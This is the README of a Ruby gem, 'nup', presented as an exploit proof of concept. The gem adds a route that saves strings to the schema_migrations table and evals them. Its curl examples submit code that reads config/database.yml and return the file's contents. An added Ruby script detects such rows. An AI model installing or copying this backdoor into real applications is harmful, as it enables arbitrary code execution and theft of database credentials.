
An exploit POC that shoehorns/evals code snippets in the schema_migrations table.


geoffroh/nup


Nup

A proof-of-concept gem that shoehorns strings into the schema_migrations table, and adds a route and controller that save strings to the database and eval them in Ruby.

Example usage:

```
rails new blog
cd blog
echo "gem 'nup', github: '[email protected]:geoffroh/nup.git'" >> Gemfile
bundle

# POST the code snippet to the indexes route, snippet id is returned
curl -d "index=File.read(\"config/database.yml\")" localhost:3000/indexes
> 1

# GET the indexes/:id to eval the snippet and return the result,
# in this case displaying the database.yml file.
curl localhost:3000/indexes/1
> # SQLite version 3.x
...
```
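A defensive check for the technique described above, as an added example that is not part of the nup repository: it compares the rows of schema_migrations against the migration files in db/migrate and flags anything Rails itself would not have written. It assumes the stored strings land in the table's standard `version` column; the function names and sample data are constructed for illustration.

```ruby
# Added example: audit schema_migrations rows against db/migrate filenames.
# Assumption: rows are read from the table's standard `version` column.

MIGRATION_FILE = /\A(\d+)_[a-z0-9_]+\.rb\z/

# Versions declared by migration files, e.g. "20240101120000_create_posts.rb".
def versions_from_files(filenames)
  filenames.filter_map { |f| File.basename(f)[MIGRATION_FILE, 1] }
end

# Classify each stored row:
#   :non_numeric - not a version number at all (Rails only writes digits here)
#   :no_file     - numeric, but no migration file declares it (worth a review)
#   :ok          - numeric and backed by a migration file
def audit_schema_migrations(rows, filenames)
  known = versions_from_files(filenames)
  rows.map do |row|
    value = row.to_s
    status =
      if value !~ /\A\d+\z/ then :non_numeric
      elsif !known.include?(value) then :no_file
      else :ok
      end
    { value: value, status: status }
  end
end

# Only the rows that need attention.
def findings(rows, filenames)
  audit_schema_migrations(rows, filenames).reject { |r| r[:status] == :ok }
end

# Constructed sample data (not taken from a real application).
SAMPLE_FILES = [
  "db/migrate/20240101120000_create_posts.rb",
  "db/migrate/20240102093000_add_title_to_posts.rb"
].freeze

SAMPLE_ROWS = [
  "20240101120000",
  "20240102093000",
  "20230101000000",                    # numeric, but no matching file
  'File.read("config/database.yml")'   # the snippet from the usage above
].freeze

if __FILE__ == $PROGRAM_NAME
  findings(SAMPLE_ROWS, SAMPLE_FILES).each do |f|
    puts format("%-12s %s", f[:status], f[:value].inspect)
  end
end
```

In a real application the rows would come from `SELECT version FROM schema_migrations` and the filenames from `Dir["db/migrate/*.rb"]`.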
